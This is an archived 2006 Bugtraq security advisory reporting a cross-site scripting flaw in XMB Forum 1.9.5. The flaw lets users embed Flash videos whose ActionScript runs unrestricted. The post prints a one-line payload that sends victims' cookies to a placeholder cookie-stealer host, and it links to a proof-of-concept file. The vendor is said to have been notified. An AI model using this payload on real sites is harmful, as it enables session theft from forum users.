[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XMB Forum 1.9.5-Final XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XMB Forum 1.9.5-Final XSS
From: r0xes.ratm@xxxxxxxxx
Date: 9 Apr 2006 00:11:35 -0000

XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed flash (.swf) videos in their posts.
Normally, you could set an option on the <object> tag to say that ActionScript 
cannot run, but in this case we don't.

The way we execute our code is by making a flash movie containing the 
Actionscript code:
getURL("javascript:document.location='http://my-site.com/path/to/cookiestealer.php?cookie='+document.cookie;");

An example video + .fla script can be downloaded at my site: 
http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar

XMB has been notified, expect this to be fixed in a few days.

comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com

Prev by Date: Re: IE6 Crash
Next by Date: Oracle read-only user can insert/update/delete data via specially crafted views
Previous by thread: [Overflow.pl] Clam AntiVirus Win32-UPX Heap Overflow (not default configuration)
Next by thread: Oracle read-only user can insert/update/delete data via specially crafted views
Index(es):
- Date
- Thread